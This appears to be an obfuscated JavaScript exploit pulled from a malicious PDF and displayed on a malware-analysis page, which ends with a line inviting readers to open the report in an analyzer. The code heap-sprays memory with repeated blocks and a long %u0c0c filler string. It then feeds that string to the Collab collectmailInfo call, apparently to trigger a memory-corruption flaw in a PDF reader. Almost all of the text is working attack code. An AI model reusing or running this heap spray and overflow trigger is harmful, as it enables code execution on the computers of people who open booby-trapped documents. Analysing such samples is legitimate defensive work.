sznjhNiJLuILHtrvAhIXlelnNQIlfFcNrwhdLFMTFZirbIndsSXdpwisjqJYvwiakRqvVOIAdQasdfafjiaehruiuifjkfnznashdkalfnhdsfjKYl = fhwpbcVvadNUtmvSVbaNLbnkoRXYJU["substring"](0, MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV);
sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi = fhwpbcVvadNUtmvSVbaNLbnkoRXYJU["substring"](0, fhwpbcVvadNUtmvSVbaNLbnkoRXYJU.length-MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV);
while(sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi.length+MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV < 0x40000) sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi = sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi+sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi+sznjhNiJLuILHtrvAhIXlelnNQIlfFcNrwhdLFMTFZirbIndsSXdpwisjqJYvwiakRqvVOIAdQasdfafjiaehruiuifjkfnznashdkalfnhdsfjKYl;
var dakslfjaljfklasfjasdlk = Array;
afsdfasfcxzfcsdagfdgfgfasdfafacadf = new dakslfjaljfklasfjasdlk();
for(afdadfcznzmzhczjncafahfjkasdhfjkdfh=0;afdadfcznzmzhczjncafahfjkasdhfjkdfh<300;afdadfcznzmzhczjncafahfjkasdhfjkdfh++) afsdfasfcxzfcsdagfdgfgfasdfafacadf[afdadfcznzmzhczjncafahfjkasdhfjkdfh] = sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi + JpeKAFDjrTfdKIERlblJLAmY;
var iJCYnMqYfdUqJybccHmtjpgocdxIgC = ahfdhfeiuiofifafjkafahfhdlfadafh("\x25\x75\x30c\x30c\x25\x750c0c");
while(iJCYnMqYfdUqJybccHmtjpgocdxIgC.length < 0x1200) iJCYnMqYfdUqJybccHmtjpgocdxIgC =iJCYnMqYfdUqJybccHmtjpgocdxIgC+iJCYnMqYfdUqJybccHmtjpgocdxIgC;
var adfafasdffsfsdfdfvcvv = Collab;
var dfzfddfgfgasfasddcacs = this;
dfzfddfgfgasfasddcacs.collabStore = adfafasdffsfsdfdfvcvv["collectmailInfo"]({subj: "",msg: iJCYnMqYfdUqJybccHmtjpgocdxIgC});
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.